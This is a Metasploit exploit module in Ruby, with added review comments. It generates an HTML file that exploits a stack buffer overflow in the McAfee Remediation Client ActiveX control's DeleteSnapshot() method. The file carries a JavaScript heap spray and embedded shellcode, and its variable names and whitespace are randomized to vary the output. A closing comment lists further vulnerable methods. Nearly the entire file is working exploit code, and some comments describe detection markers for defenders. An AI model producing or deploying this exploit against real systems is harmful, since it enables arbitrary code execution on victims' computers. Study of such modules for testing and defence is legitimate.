##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  # LowRanking: the single target below pins one fixed Ret value, so reliability
  # presumably depends on that address being usable on the victim (rank rationale
  # is not recorded here).
  Rank = LowRanking

  # File-format mixin: provides file_create (called in #exploit) and the
  # FILENAME datastore convention registered below.
  include Msf::Exploit::FILEFORMAT

  # Registers module metadata (name, references, payload constraints, targets)
  # and the FILENAME option used for the generated HTML file.
  #
  # @param info [Hash] metadata merged into this module's info via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'McAfee Remediation Client ActiveX Control Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in McAfee Remediation Agent 4.5.0.41. When
        sending an overly long string to the DeleteSnapshot() method
        of enginecom.dll (3.7.0.9) an attacker may be able to execute arbitrary code.
        This control is not marked safe for scripting, so choose your attack vector accordingly.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'MC' ],
      'References'     =>
        [
          [ 'OSVDB', '94540' ],
          [ 'EDB', '16639' ]
        ],
      # No handler is started by this module (file-format delivery); the
      # payload exits via the process exit function.
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => true
        },
      # Payload is embedded via JavaScript unescape(), so NUL is the only bad char.
      'Payload'        =>
        {
          'Space'         => 1024,
          'BadChars'      => "\x00",
        },
      'Platform'       => 'win',
      # 'Ret' is consumed in #exploit via target.ret.
      'Targets'        =>
        [
          [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]
        ],
      'DisclosureDate' => '2008-08-04',
      'DefaultTarget'  => 0))

      # Output file name; defaults to 'msf.html' when not set.
      register_options(
        [
          OptString.new('FILENAME', [ false, 'The file name.',  'msf.html']),
        ])
  end

  # Builds the HTML document and writes it to FILENAME via file_create.
  #
  # The generated page instantiates the 'Enginecom.imagineLANEngine.1' ActiveX
  # control and calls DeleteSnapshot() with an overlong string. Static markers
  # a defender can key on are that ProgID and the DeleteSnapshot() call;
  # identifiers are randomized per run and whitespace is randomized below, so
  # detection should not depend on variable names or spacing.
  #
  # @return [void]
  def exploit
    # Encode the shellcode as a JavaScript unescape()-compatible string,
    # with byte order taken from the target architecture.
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

    # Create some nops (4 bytes), likewise unescape()-encoded.
    nops    = Rex::Text.to_unescape(make_nops(4))

    # Set the return: target.ret packed as a 32-bit unsigned integer.
    # NOTE(review): 'L' is native-endian on the host running the module;
    # 'V' would pin little-endian explicitly. Confirm before changing.
    ret     = Rex::Text.uri_encode([target.ret].pack('L'))

    # Randomize the javascript variable names (1..100 alpha chars each;
    # the loop index gets 2..31).
    vname  = rand_text_alpha(rand(100) + 1)
    var_i  = rand_text_alpha(rand(30)  + 2)
    rand1  = rand_text_alpha(rand(100) + 1)
    rand2  = rand_text_alpha(rand(100) + 1)
    rand3  = rand_text_alpha(rand(100) + 1)
    rand4  = rand_text_alpha(rand(100) + 1)
    rand5  = rand_text_alpha(rand(100) + 1)
    rand6  = rand_text_alpha(rand(100) + 1)
    rand7  = rand_text_alpha(rand(100) + 1)
    rand8  = rand_text_alpha(rand(100) + 1)

    # The page body is a single interpolated string; any failure inside the
    # script is caught and the window is redirected to about:blank.
    content = %Q|<html>
<head>
<script>
try {
  var #{vname} = new ActiveXObject('Enginecom.imagineLANEngine.1');
  var #{rand1} = unescape('#{shellcode}');
  var #{rand2} = unescape('#{nops}');
  var #{rand3} = 20;
  var #{rand4} = #{rand3} + #{rand1}.length;
  while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
  var #{rand5} = #{rand2}.substring(0,#{rand4});
  var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
  while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
  var #{rand7} = new Array();
  for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
  var #{rand8} = "";
  for (#{var_i} = 0; #{var_i} < 1024; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
  #{vname}.DeleteSnapshot(#{rand8});
} catch( e ) { window.location = 'about:blank' ; }
</script>
</head>
</html>
|

    # Presumably varies whitespace so the output differs between runs;
    # the markers noted above are unaffected.
    content = Rex::Text.randomize_space(content)

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    # Writes the content to the FILENAME datastore option.
    file_create(content)
  end
end

=begin

Other vulnerable methods:

[id(0x0000000c), helpstring("method CreateSnapFromDefaultProfile")]
void CreateSnapFromDefaultProfile(BSTR szDescription);

[id(0x00000013), helpstring("method CreateReportOfSysInfoDifferences")]
void CreateReportOfSysInfoDifferences(
  BSTR szOldSnapFile,
  BSTR szNewSnapFile,
  BSTR szOutFile,
  short format,
  short append);

[id(0x0000000f), helpstring("method CreateReportOfSnapshotDifferences")]
void CreateReportOfSnapshotDifferences(
  BSTR szOldSnapFile,
  BSTR szNewSnapFile,
  BSTR szOutFile,
  short format);

[id(0x00000012), helpstring("method CreateReportOfAssetDifferences")]
void CreateReportOfAssetDifferences(
  BSTR szOldSnapFile,
  BSTR szNewSnapFile,
  BSTR szOutFile,
  short format,
  BSTR pszAsset,
  short append);

=end